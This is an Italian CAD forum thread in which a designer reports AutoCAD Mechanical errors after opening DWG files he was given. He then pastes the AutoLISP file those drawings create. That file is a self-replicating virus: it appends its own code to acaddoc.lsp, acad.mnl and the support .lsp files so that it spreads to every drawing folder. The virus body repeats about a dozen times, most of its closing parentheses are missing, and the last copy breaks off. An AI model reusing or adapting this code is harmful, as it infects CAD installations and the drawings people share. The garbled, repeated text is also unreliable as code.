
Utente Standard
Professione: PROGETTISTA
Software: Solidworks 2016- autocad mech 2013-2017
Regione: lombardia
dovreste aiutarmi per favore, mi hanno dato dei file in cui dice che sono incompatibili etc etc ok li apro...ma il problema è che ho già reinstallato 2 volte autocad mechanical 2013 , mi perde in avvio il caricamento di 6 file lisp che uso di solito e mi dice:

Loading Modeler DLLs.
Opening an AutoCAD 2007/LT 2007 format file.
Substituting [SANSS___.TTF] for [sas_____.pfb].
Regenerating model.
This drawing was created in language 'ITA' with translation information. Before working with this drawing you should translate it into system language 'ENU'. Working with the untranslated drawing may delete the translation information.; error: malformed list on input
AutoCAD menu utilities loaded.malformed list on input
Autodesk DWG. This file is a TrustedDWG last saved by an Autodesk application or Autodesk licensed application.
Command: RT Unknown command "RT". Press F1 for help.


Utente Standard
Professione: PROGETTISTA
Software: Solidworks 2016- autocad mech 2013-2017
Regione: lombardia
ciao ho fatto reset e anche reinstallato ma nulla con questi dwg mi crea un file lisp nella cartella..

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
